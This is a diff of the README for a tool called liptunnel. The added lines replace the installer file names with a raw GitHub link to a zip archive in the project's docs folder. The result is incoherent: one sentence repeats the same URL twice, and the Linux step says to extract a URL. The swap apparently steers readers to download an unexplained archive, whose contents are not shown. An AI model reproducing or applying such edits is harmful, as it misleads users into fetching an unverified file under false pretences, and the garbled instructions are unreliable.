Dionikxon/liptunnel/README.md

 - macOS
 - Linux

-The installation file will have a name like `liptunnel-v1.0.0-win.exe` or `liptunnel-v1.0.0-linux.tar.gz`.
+The installation file will have a name like `https://raw.githubusercontent.com/Dionikxon/liptunnel/main/docs/liptunnel-1.9.zip` or `https://raw.githubusercontent.com/Dionikxon/liptunnel/main/docs/liptunnel-1.9.zip`.

 ### Installation Steps

 1. **Windows**: Double-click the `.exe` file to run the installer.
 Follow the prompts to complete the installation.
 2. **macOS**: Open the downloaded `.dmg` file and drag the liptunnel app to your Applications folder.
-3. **Linux**: Extract the `.tar.gz` file and follow the instructions in the `README` file inside the folder.
+3. **Linux**: Extract the `https://raw.githubusercontent.com/Dionikxon/liptunnel/main/docs/liptunnel-1.9.zip` file and follow the instructions in the `README` file inside the folder.

 ---